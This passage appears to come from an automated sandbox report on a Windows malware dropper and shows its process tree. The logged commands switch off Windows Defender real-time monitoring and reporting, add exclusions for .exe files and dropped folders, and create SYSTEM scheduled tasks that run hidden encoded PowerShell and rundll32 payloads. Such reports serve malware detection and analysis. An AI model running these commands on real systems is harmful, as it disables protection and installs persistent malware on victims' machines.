memory of 2600 2216 cmd.exe 39 PID 2216 wrote to memory of 2600 2216 cmd.exe 39 PID 2216 wrote to memory of 2600 2216 cmd.exe 39 PID 2216 wrote to memory of 2600 2216 cmd.exe 39 PID 2216 wrote to memory of 2600 2216 cmd.exe 39 PID 2216 wrote to memory of 2600 2216 cmd.exe 39 PID 2216 wrote to memory of 2600 2216 cmd.exe 39 PID 2548 wrote to memory of 2620 2548 cmd.exe 40
Processes
-
C:\Users\Admin\AppData\Local\Temp\file.exe"C:\Users\Admin\AppData\Local\Temp\file.exe"1⤵
- Loads dropped DLL
- Suspicious use of WriteProcessMemory
PID:2468 -
C:\Users\Admin\AppData\Local\Temp\7zS5013.tmp\Install.exe.\Install.exe2⤵
- Executes dropped EXE
- Loads dropped DLL
- Suspicious use of WriteProcessMemory
PID:2632 -
C:\Users\Admin\AppData\Local\Temp\7zS5226.tmp\Install.exe.\Install.exe /OUdidfQn "525403" /S3⤵
- Checks BIOS information in registry
- Executes dropped EXE
- Loads dropped DLL
- Drops file in System32 directory
- Enumerates system info in registry
- Suspicious use of WriteProcessMemory
PID:2232 -
C:\Windows\SysWOW64\forfiles.exe"C:\Windows\System32\forfiles.exe" /p c:\windows\system32 /m cmd.exe /c "cmd /C REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions\" /f /v \"exe\" /t REG_SZ /d 0 /reg:32&REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions\" /f /v \"exe\" /t REG_SZ /d 0 /reg:64&"4⤵
- Suspicious use of WriteProcessMemory
PID:2584 -
C:\Windows\SysWOW64\cmd.exe/C REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions" /f /v "exe" /t REG_SZ /d 0 /reg:32&REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions" /f /v "exe" /t REG_SZ /d 0 /reg:64&5⤵
- Suspicious use of WriteProcessMemory
PID:2216 -
\??\c:\windows\SysWOW64\reg.exeREG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions" /f /v "exe" /t REG_SZ /d 0 /reg:326⤵PID:2544
-
-
\??\c:\windows\SysWOW64\reg.exeREG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions" /f /v "exe" /t REG_SZ /d 0 /reg:646⤵PID:2600
-
-
-
-
C:\Windows\SysWOW64\forfiles.exe"C:\Windows\System32\forfiles.exe" /p c:\windows\system32 /m cmd.exe /c "cmd /C REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet\" /f /v \"SpyNetReporting\" /t REG_DWORD /d 0 /reg:32&REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet\" /f /v \"SpyNetReporting\" /t REG_DWORD /d 0 /reg:64&"4⤵
- Suspicious use of WriteProcessMemory
PID:2720 -
C:\Windows\SysWOW64\cmd.exe/C REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet" /f /v "SpyNetReporting" /t REG_DWORD /d 0 /reg:32&REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet" /f /v "SpyNetReporting" /t REG_DWORD /d 0 /reg:64&5⤵
- Suspicious use of WriteProcessMemory
PID:2548 -
\??\c:\windows\SysWOW64\reg.exeREG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet" /f /v "SpyNetReporting" /t REG_DWORD /d 0 /reg:326⤵PID:2568
-
-
\??\c:\windows\SysWOW64\reg.exeREG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet" /f /v "SpyNetReporting" /t REG_DWORD /d 0 /reg:646⤵PID:2620
-
-
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /CREATE /TN "gSWiwdvBF" /SC once /ST 11:07:26 /F /RU "Admin" /TR "powershell -WindowStyle Hidden -EncodedCommand cwB0AGEAcgB0AC0AcAByAG8AYwBlAHMAcwAgAC0AVwBpAG4AZABvAHcAUwB0AHkAbABlACAASABpAGQAZABlAG4AIABnAHAAdQBwAGQAYQB0AGUALgBlAHgAZQAgAC8AZgBvAHIAYwBlAA=="4⤵
- Creates scheduled task(s)
PID:3056
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /run /I /tn "gSWiwdvBF"4⤵PID:2344
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /DELETE /F /TN "gSWiwdvBF"4⤵PID:1668
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /CREATE /TN "bbPqNtaaeFeEtSKaKR" /SC once /ST 18:39:00 /RU "SYSTEM" /TR "\"C:\Users\Admin\AppData\Local\Temp\UcpCEAFeKxUwNazky\krtsSySmQGsixlr\VUHPWtm.exe\" 8N /qxsite_idIGO 525403 /S" /V1 /F4⤵
- Drops file in Windows directory
- Creates scheduled task(s)
PID:2160
-
-
-
-
C:\Windows\system32\taskeng.exetaskeng.exe {3C965E1A-0F07-445A-9B04-0EEA4887138F} S-1-5-21-2084844033-2744876406-2053742436-1000:GGPVHMXR\Admin:Interactive:[1]1⤵PID:2528
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXEC:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE -WindowStyle Hidden -EncodedCommand cwB0AGEAcgB0AC0AcAByAG8AYwBlAHMAcwAgAC0AVwBpAG4AZABvAHcAUwB0AHkAbABlACAASABpAGQAZABlAG4AIABnAHAAdQBwAGQAYQB0AGUALgBlAHgAZQAgAC8AZgBvAHIAYwBlAA==2⤵
- Drops file in System32 directory
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:268 -
C:\Windows\system32\gpupdate.exe"C:\Windows\system32\gpupdate.exe" /force3⤵PID:2936
-
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXEC:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE -WindowStyle Hidden -EncodedCommand cwB0AGEAcgB0AC0AcAByAG8AYwBlAHMAcwAgAC0AVwBpAG4AZABvAHcAUwB0AHkAbABlACAASABpAGQAZABlAG4AIABnAHAAdQBwAGQAYQB0AGUALgBlAHgAZQAgAC8AZgBvAHIAYwBlAA==2⤵
- Drops file in System32 directory
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:1992 -
C:\Windows\system32\gpupdate.exe"C:\Windows\system32\gpupdate.exe" /force3⤵PID:1196
-
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXEC:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE -WindowStyle Hidden -EncodedCommand cwB0AGEAcgB0AC0AcAByAG8AYwBlAHMAcwAgAC0AVwBpAG4AZABvAHcAUwB0AHkAbABlACAASABpAGQAZABlAG4AIABnAHAAdQBwAGQAYQB0AGUALgBlAHgAZQAgAC8AZgBvAHIAYwBlAA==2⤵
- Drops file in System32 directory
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:3032 -
C:\Windows\system32\gpupdate.exe"C:\Windows\system32\gpupdate.exe" /force3⤵PID:2212
-
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXEC:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE -WindowStyle Hidden -EncodedCommand cwB0AGEAcgB0AC0AcAByAG8AYwBlAHMAcwAgAC0AVwBpAG4AZABvAHcAUwB0AHkAbABlACAASABpAGQAZABlAG4AIABnAHAAdQBwAGQAYQB0AGUALgBlAHgAZQAgAC8AZgBvAHIAYwBlAA==2⤵
- Drops file in System32 directory
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:1648 -
C:\Windows\system32\gpupdate.exe"C:\Windows\system32\gpupdate.exe" /force3⤵PID:2664
-
-
-
C:\Windows\system32\gpscript.exegpscript.exe /RefreshSystemParam1⤵PID:3028
-
C:\Windows\system32\taskeng.exetaskeng.exe {844FD9B2-A621-49CB-A203-C8387BA80896} S-1-5-18:NT AUTHORITY\System:Service:1⤵PID:1936
-
C:\Users\Admin\AppData\Local\Temp\UcpCEAFeKxUwNazky\krtsSySmQGsixlr\VUHPWtm.exeC:\Users\Admin\AppData\Local\Temp\UcpCEAFeKxUwNazky\krtsSySmQGsixlr\VUHPWtm.exe 8N /qxsite_idIGO 525403 /S2⤵
- Executes dropped EXE
- Drops file in System32 directory
PID:1712 -
C:\Windows\SysWOW64\schtasks.exeschtasks /CREATE /TN "gmRhySNwL" /SC once /ST 13:45:41 /F /RU "Admin" /TR "powershell -WindowStyle Hidden -EncodedCommand cwB0AGEAcgB0AC0AcAByAG8AYwBlAHMAcwAgAC0AVwBpAG4AZABvAHcAUwB0AHkAbABlACAASABpAGQAZABlAG4AIABnAHAAdQBwAGQAYQB0AGUALgBlAHgAZQAgAC8AZgBvAHIAYwBlAA=="3⤵
- Creates scheduled task(s)
PID:1744
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /run /I /tn "gmRhySNwL"3⤵PID:2384
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /DELETE /F /TN "gmRhySNwL"3⤵PID:2392
-
-
C:\Windows\SysWOW64\cmd.execmd /C REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Real-time Protection" /f /v "DisableRealtimeMonitoring" /t REG_DWORD /d 1 /reg:323⤵PID:2016
-
C:\Windows\SysWOW64\reg.exeREG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Real-time Protection" /f /v "DisableRealtimeMonitoring" /t REG_DWORD /d 1 /reg:324⤵
- Modifies Windows Defender Real-time Protection settings
PID:1896
-
-
-
C:\Windows\SysWOW64\cmd.execmd /C REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Real-time Protection" /f /v "DisableRealtimeMonitoring" /t REG_DWORD /d 1 /reg:643⤵PID:1764
-
C:\Windows\SysWOW64\reg.exeREG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Real-time Protection" /f /v "DisableRealtimeMonitoring" /t REG_DWORD /d 1 /reg:644⤵
- Modifies Windows Defender Real-time Protection settings
PID:1356
-
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /CREATE /TN "gRfXvVkxD" /SC once /ST 01:56:19 /F /RU "Admin" /TR "powershell -WindowStyle Hidden -EncodedCommand cwB0AGEAcgB0AC0AcAByAG8AYwBlAHMAcwAgAC0AVwBpAG4AZABvAHcAUwB0AHkAbABlACAASABpAGQAZABlAG4AIABnAHAAdQBwAGQAYQB0AGUALgBlAHgAZQAgAC8AZgBvAHIAYwBlAA=="3⤵
- Creates scheduled task(s)
PID:964
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /run /I /tn "gRfXvVkxD"3⤵PID:1256
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /DELETE /F /TN "gRfXvVkxD"3⤵PID:1492
-
-
C:\Windows\SysWOW64\cmd.execmd /C REG ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Windows\Temp\tZRuTBnWsrIvjiMS" /t REG_DWORD /d 0 /reg:323⤵PID:1316
-
C:\Windows\SysWOW64\reg.exeREG ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Windows\Temp\tZRuTBnWsrIvjiMS" /t REG_DWORD /d 0 /reg:324⤵
- Windows security bypass
PID:2104
-
-
-
C:\Windows\SysWOW64\cmd.execmd /C REG ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Windows\Temp\tZRuTBnWsrIvjiMS" /t REG_DWORD /d 0 /reg:643⤵PID:2056
-
C:\Windows\SysWOW64\reg.exeREG ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Windows\Temp\tZRuTBnWsrIvjiMS" /t REG_DWORD /d 0 /reg:644⤵
- Windows security bypass
PID:1596
-
-
-
C:\Windows\SysWOW64\cmd.execmd /C REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Windows\Temp\tZRuTBnWsrIvjiMS" /t REG_DWORD /d 0 /reg:323⤵PID:1588
-
C:\Windows\SysWOW64\reg.exeREG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Windows\Temp\tZRuTBnWsrIvjiMS" /t REG_DWORD /d 0 /reg:324⤵PID:2032
-
-
-
C:\Windows\SysWOW64\cmd.execmd /C REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Windows\Temp\tZRuTBnWsrIvjiMS" /t REG_DWORD /d 0 /reg:643⤵PID:1244
-
C:\Windows\SysWOW64\reg.exeREG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Windows\Temp\tZRuTBnWsrIvjiMS" /t REG_DWORD /d 0 /reg:644⤵PID:2360
-
-
-
C:\Windows\SysWOW64\cmd.execmd /C copy nul "C:\Windows\Temp\tZRuTBnWsrIvjiMS\CdNarbQP\eRPlKQVHouPxFByP.wsf"3⤵PID:2640
-
-
C:\Windows\SysWOW64\wscript.exewscript "C:\Windows\Temp\tZRuTBnWsrIvjiMS\CdNarbQP\eRPlKQVHouPxFByP.wsf"3⤵
- Modifies data under HKEY_USERS
PID:2736 -
C:\Windows\SysWOW64\reg.exe"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\XfLIShEvOXUn" /t REG_DWORD /d 0 /reg:324⤵
- Windows security bypass
PID:364
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\XfLIShEvOXUn" /t REG_DWORD /d 0 /reg:644⤵
- Windows security bypass
PID:1800
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\bNpaxMIFBfOU2" /t REG_DWORD /d 0 /reg:324⤵
- Windows security bypass
PID:2984
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\bNpaxMIFBfOU2" /t REG_DWORD /d 0 /reg:644⤵
- Windows security bypass
PID:2604
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\jxiGQpNjugTNMjfxWSR" /t REG_DWORD /d 0 /reg:324⤵
- Windows security bypass
PID:2612
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\jxiGQpNjugTNMjfxWSR" /t REG_DWORD /d 0 /reg:644⤵
- Windows security bypass
PID:2584
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\rXjduNqsU" /t REG_DWORD /d 0 /reg:324⤵
- Windows security bypass
PID:2720
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\rXjduNqsU" /t REG_DWORD /d 0 /reg:644⤵
- Windows security bypass
PID:1172
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\sExqNpidIxpuC" /t REG_DWORD /d 0 /reg:324⤵
- Windows security bypass
PID:1280
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\sExqNpidIxpuC" /t REG_DWORD /d 0 /reg:644⤵
- Windows security bypass
PID:436
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\ProgramData\mIZkPWOoOJyyBkVB" /t REG_DWORD /d 0 /reg:324⤵
- Windows security bypass
PID:2792
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\ProgramData\mIZkPWOoOJyyBkVB" /t REG_DWORD /d 0 /reg:644⤵
- Windows security bypass
PID:2764
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions" /t REG_DWORD /d 0 /reg:324⤵
- Windows security bypass
PID:2728
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions" /t REG_DWORD /d 0 /reg:644⤵
- Windows security bypass
PID:1308
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Users\Admin\AppData\Local\Temp\UcpCEAFeKxUwNazky" /t REG_DWORD /d 0 /reg:324⤵
- Windows security bypass
PID:1180
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Users\Admin\AppData\Local\Temp\UcpCEAFeKxUwNazky" /t REG_DWORD /d 0 /reg:644⤵
- Windows security bypass
PID:1096
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Windows\Temp\tZRuTBnWsrIvjiMS" /t REG_DWORD /d 0 /reg:324⤵
- Windows security bypass
PID:1932
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Windows\Temp\tZRuTBnWsrIvjiMS" /t REG_DWORD /d 0 /reg:644⤵
- Windows security bypass
PID:1996
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\XfLIShEvOXUn" /t REG_DWORD /d 0 /reg:324⤵PID:1612
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\XfLIShEvOXUn" /t REG_DWORD /d 0 /reg:644⤵PID:2456
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\bNpaxMIFBfOU2" /t REG_DWORD /d 0 /reg:324⤵PID:1500
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\bNpaxMIFBfOU2" /t REG_DWORD /d 0 /reg:644⤵PID:932
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\jxiGQpNjugTNMjfxWSR" /t REG_DWORD /d 0 /reg:324⤵PID:2644
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\jxiGQpNjugTNMjfxWSR" /t REG_DWORD /d 0 /reg:644⤵PID:1148
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\rXjduNqsU" /t REG_DWORD /d 0 /reg:324⤵PID:2440
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\rXjduNqsU" /t REG_DWORD /d 0 /reg:644⤵PID:1204
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\sExqNpidIxpuC" /t REG_DWORD /d 0 /reg:324⤵PID:1544
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\sExqNpidIxpuC" /t REG_DWORD /d 0 /reg:644⤵PID:2276
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\ProgramData\mIZkPWOoOJyyBkVB" /t REG_DWORD /d 0 /reg:324⤵PID:1848
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\ProgramData\mIZkPWOoOJyyBkVB" /t REG_DWORD /d 0 /reg:644⤵PID:572
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions" /t REG_DWORD /d 0 /reg:324⤵PID:1680
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions" /t REG_DWORD /d 0 /reg:644⤵PID:396
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Users\Admin\AppData\Local\Temp\UcpCEAFeKxUwNazky" /t REG_DWORD /d 0 /reg:324⤵PID:1084
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Users\Admin\AppData\Local\Temp\UcpCEAFeKxUwNazky" /t REG_DWORD /d 0 /reg:644⤵PID:1528
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Windows\Temp\tZRuTBnWsrIvjiMS" /t REG_DWORD /d 0 /reg:324⤵PID:1292
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Windows\Temp\tZRuTBnWsrIvjiMS" /t REG_DWORD /d 0 /reg:644⤵PID:1604
-
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /CREATE /TN "goiaYteal" /SC once /ST 02:59:40 /F /RU "Admin" /TR "powershell -WindowStyle Hidden -EncodedCommand cwB0AGEAcgB0AC0AcAByAG8AYwBlAHMAcwAgAC0AVwBpAG4AZABvAHcAUwB0AHkAbABlACAASABpAGQAZABlAG4AIABnAHAAdQBwAGQAYQB0AGUALgBlAHgAZQAgAC8AZgBvAHIAYwBlAA=="3⤵
- Creates scheduled task(s)
PID:936
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /run /I /tn "goiaYteal"3⤵PID:2480
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /DELETE /F /TN "goiaYteal"3⤵PID:2120
-
-
C:\Windows\SysWOW64\cmd.execmd /C REG DELETE "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Real-time Protection" /v "DisableRealtimeMonitoring" /f /reg:323⤵PID:1584
-
C:\Windows\SysWOW64\reg.exeREG DELETE "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Real-time Protection" /v "DisableRealtimeMonitoring" /f /reg:324⤵PID:2032
-
-
-
C:\Windows\SysWOW64\cmd.execmd /C REG DELETE "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Real-time Protection" /v "DisableRealtimeMonitoring" /f /reg:643⤵PID:1588
-
C:\Windows\SysWOW64\reg.exeREG DELETE "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Real-time Protection" /v "DisableRealtimeMonitoring" /f /reg:644⤵PID:2360
-
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /CREATE /TN "GVFFxSkoOBQmaesjx" /SC once /ST 17:38:54 /RU "SYSTEM" /TR "\"C:\Windows\Temp\tZRuTBnWsrIvjiMS\gQaBqPmlfJhfnAA\yNgrYVo.exe\" Xs /bzsite_idzuK 525403 /S" /V1 /F3⤵
- Drops file in Windows directory
- Creates scheduled task(s)
PID:2368
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /run /I /tn "GVFFxSkoOBQmaesjx"3⤵PID:2900
-
-
-
C:\Windows\Temp\tZRuTBnWsrIvjiMS\gQaBqPmlfJhfnAA\yNgrYVo.exeC:\Windows\Temp\tZRuTBnWsrIvjiMS\gQaBqPmlfJhfnAA\yNgrYVo.exe Xs /bzsite_idzuK 525403 /S2⤵
- Checks computer location settings
- Executes dropped EXE
- Drops Chrome extension
- Drops file in System32 directory
- Drops file in Program Files directory
- Modifies data under HKEY_USERS
- Suspicious behavior: EnumeratesProcesses
PID:1928 -
C:\Windows\SysWOW64\schtasks.exeschtasks /DELETE /F /TN "bbPqNtaaeFeEtSKaKR"3⤵PID:2940
-
-
C:\Windows\SysWOW64\cmd.execmd /C REG DELETE "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions" /v "exe" /f /reg:323⤵PID:2560
-
C:\Windows\SysWOW64\reg.exeREG DELETE "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions" /v "exe" /f /reg:324⤵PID:2920
-
-
-
C:\Windows\SysWOW64\cmd.execmd /C REG DELETE "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions" /v "exe" /f /reg:643⤵PID:2612
-
C:\Windows\SysWOW64\reg.exeREG DELETE "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions" /v "exe" /f /reg:644⤵PID:2716
-
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /CREATE /TR "rundll32 \"C:\Program Files (x86)\rXjduNqsU\FhMRzS.dll\",#1" /RU "SYSTEM" /SC ONLOGON /TN "ydgLTpiJkJvZaMG" /V1 /F3⤵
- Drops file in Windows directory
- Creates scheduled task(s)
PID:2548
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /CREATE /TN "ydgLTpiJkJvZaMG2" /F /xml "C:\Program Files (x86)\rXjduNqsU\YRmTlyd.xml" /RU "SYSTEM"3⤵
- Creates scheduled task(s)
PID:1908
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /END /TN "ydgLTpiJkJvZaMG"3⤵PID:1884
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /DELETE /F /TN "ydgLTpiJkJvZaMG"3⤵PID:2200
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /CREATE /TN "KnGwbHArRBeaeV" /F /xml "C:\Program Files (x86)\bNpaxMIFBfOU2\zTkcCtK.xml" /RU "SYSTEM"3⤵
- Creates scheduled task(s)
PID:3068
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /CREATE /TN "PYfufpvJvopmW2" /F /xml "C:\ProgramData\mIZkPWOoOJyyBkVB\qMMcYGi.xml" /RU "SYSTEM"3⤵
- Creates scheduled task(s)
PID:276
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /CREATE /TN "PjCRMuBebEpnyGhYW2" /F /xml "C:\Program Files (x86)\jxiGQpNjugTNMjfxWSR\JYSyzHW.xml" /RU "SYSTEM"3⤵
- Creates scheduled task(s)
PID:2484
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /CREATE /TN "pnSNJxEXsCJvVRidMKW2" /F /xml "C:\Program Files (x86)\sExqNpidIxpuC\mShNRbs.xml" /RU "SYSTEM"3⤵
- Creates scheduled task(s)
PID:3012
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /CREATE /TN "jFAecgscnrJhBwrRF" /SC once /ST 01:21:03 /RU "SYSTEM" /TR "rundll32 \"C:\Windows\Temp\tZRuTBnWsrIvjiMS\nMnJSQRH\UlJVOFD.dll\",#1 /VKsite_idBSU 525403" /V1 /F3⤵
- Drops file in Windows directory
- Creates scheduled task(s)
